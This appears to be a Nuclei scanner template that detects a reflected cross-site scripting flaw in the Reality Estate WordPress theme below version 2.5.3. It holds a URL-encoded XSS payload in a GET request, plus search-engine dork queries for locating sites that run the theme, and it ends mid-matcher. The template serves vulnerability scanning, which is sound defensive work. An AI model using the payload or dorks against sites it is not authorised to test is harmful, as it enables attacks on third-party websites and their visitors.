id: wp-reality-estate-theme info: name: Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Reflected XSS was discovered in the 'Reality | Estate Multipurpose WordPress Theme'. remediation: update to v.2.5.3 reference: - https://wpscan.com/vulnerability/10064 - https://www.exploitalert.com/view-details.html?id=34777 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 metadata: verified: true max-request: 1 publicwww-query: /wp-content/themes/reality/ google-query: inurl:"/wp-content/themes/reality/" tags: wpscan,xss,wordpress,wp,wp-theme,reality,estate http: - method: GET path: - "{{BaseURL}}/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "reality", "estate", ">